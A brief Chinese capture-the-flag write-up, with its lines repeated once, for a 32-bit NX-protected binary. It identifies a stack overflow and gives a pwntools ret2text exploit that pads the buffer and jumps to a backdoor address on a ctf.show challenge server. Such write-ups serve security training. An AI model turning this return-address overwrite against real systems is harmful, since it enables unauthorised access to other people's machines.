checksec
32位程序nx保护
ida:
很明显的栈溢出ret2text
exp:
from pwn import* r=remote("pwn.challenge.ctf.show", 28146) backdoor=0x8048486 payload=b"a"*(0x14+4)+p32(backdoor) r.sendline(payload) r.interactive()
32位程序nx保护
很明显的栈溢出ret2text
from pwn import* r=remote("pwn.challenge.ctf.show", 28146) backdoor=0x8048486 payload=b"a"*(0x14+4)+p32(backdoor) r.sendline(payload) r.interactive()